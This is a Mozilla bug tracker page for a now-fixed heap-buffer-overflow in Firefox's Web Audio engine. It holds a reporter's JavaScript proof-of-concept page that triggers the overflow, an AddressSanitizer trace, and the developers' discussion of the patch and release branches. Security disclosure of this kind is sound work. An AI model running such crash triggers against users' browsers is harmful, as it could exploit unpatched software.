Heap-buffer-overflow READ in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer

RESOLVED FIXED in Firefox 24

Status

()

defect
RESOLVED FIXED
6 years ago
3 years ago

People

(Reporter: attekett, Assigned: Ehsan)

Tracking

(4 keywords)

unspecified
mozilla24
x86_64
All
Points:
---
Dependency tree / graph
Bug Flags:
sec-bounty +
in-testsuite +

Firefox Tracking Flags

(firefox21 unaffected, firefox22+ disabled, firefox23+ disabled, firefox24+ fixed, firefox-esr17 unaffected, b2g18 unaffected)

Details

(Whiteboard: [asan][adv-main24-])

Attachments

(2 attachments)

Reporter

Description

6 years ago
Tested on:

OS: Ubuntu 12.04

Firefox: ASAN opt-build 24.0a1 from 
https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1369217427/ 

Repro-case:

<script>
var Context0= new AudioContext()
var BufferSource6=Context0.createBufferSource();

setInterval(function(){
BufferSource6.buffer=function(){
	var length=11283;
	var Buffer=Context0.createBuffer(1,length,Context0.sampleRate);
	var bufferData= Buffer.getChannelData(0);
	for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i*(624))};
	return Buffer;
}();
},0)

BufferSource6.start(0.15831333969254047,0.23571860056836158,0.529235512483865);

BufferSource6.buffer=function(){
	var length=48517;
	var Buffer=Context0.createBuffer(1,length,Context0.sampleRate);
	var bufferData= Buffer.getChannelData(0);
	for (var i = 0; i < length; ++i) { bufferData[i] = Math.sin(i*(365))};
	return Buffer;
}();
</script>


ASAN-report:

==31496== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f44ca227118 at pc 0x7f44f856318d bp 0x7f44d0c10070 sp 0x7f44d0c10068
READ of size 1 at 0x7f44ca227118 thread T26
    #0 0x7f44f856318c in mozilla::dom::AudioBufferSourceNodeEngine::CopyFromInputBuffer(mozilla::AudioChunk*, unsigned int, unsigned long, unsigned long, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:172
    #1 0x7f44f856171f in mozilla::dom::AudioBufferSourceNodeEngine::ProduceAudioBlock(mozilla::AudioNodeStream*, mozilla::AudioChunk const&, mozilla::AudioChunk*, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/webaudio/AudioBufferSourceNode.cpp:392
    #2 0x7f44f84d117e in mozilla::AudioNodeStream::ProduceOutput(long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/AudioNodeStream.cpp:411
    #3 0x7f44f853ec83 in mozilla::MediaStreamGraphImpl::ProduceDataForStreamsBlockByBlock(unsigned int, long, long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:937
    #4 0x7f44f8550e05 in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/content/media/MediaStreamGraph.cpp:1163
    #5 0x7f44fabe2212 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238
.
.
.
OS: Linux → All
Assignee

Updated

6 years ago
Blocks: webaudio
Assignee

Comment 1

6 years ago
Posted file Testcase
Assignee

Updated

6 years ago
Attachment #752781 - Attachment mime type: text/plain → text/html
Assignee

Updated

6 years ago
Duplicate of this bug: 874934
Assignee

Comment 3

6 years ago
For the analysis, see bug 874934.
Assignee

Comment 4

6 years ago
Posted patch Patch (v1)Splinter Review
Assignee: nobody → ehsan
Status: NEW → ASSIGNED
Attachment #752894 - Flags: review?(roc)
Assignee

Updated

6 years ago
Blocks: 875617
https://hg.mozilla.org/mozilla-central/rev/04d09d48a9f1
Status: ASSIGNED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla24
Flags: sec-bounty?
See Also: → 878478
WebAudio is disabled in Firefox 22 and 23, correct?
Flags: sec-bounty? → sec-bounty+
This should have gone through sec-approval before going in if it isn't disabled based on earlier comments and the rating. 

https://wiki.mozilla.org/Security/Bug_Approval_Process

We'll need to take this on Aurora and Beta now to make sure we don't ship it if it isn't disabled by default. Please nominate patches for those branches. What are the risks associated with doing so? Will the existing patch apply?
Whiteboard: [asan]
Assignee

Comment 11

6 years ago
(In reply to Daniel Veditz [:dveditz] from comment #9)
> WebAudio is disabled in Firefox 22 and 23, correct?

Like all Web Audio bugs, it affects trunk, and 23, until 23 goes to beta.

(In reply to Al Billings [:abillings] from comment #10)
> We'll need to take this on Aurora and Beta now to make sure we don't ship it
> if it isn't disabled by default. Please nominate patches for those branches.
> What are the risks associated with doing so? Will the existing patch apply?

This is not needed on Beta since Web Audio is disabled there.  And it will be disabled on 23 once it gets to release.  Most if not all of these security bugs are relatively low-risk but there is some effort involved in uplifting them all to Aurora, and I'm not sure if we need to do that since we know that 23 will not ship Web Audio...
Assignee

Comment 12

6 years ago
Mass moving Web Audio bugs to the Web Audio component.  Filter on duckityduck.
Component: Video/Audio → Web Audio
Whiteboard: [asan] → [asan][adv-main24-]
Flags: in-testsuite?
Flags: in-testsuite? → in-testsuite+
Group: core-security
You need to log in before you can comment on or make changes to this bug.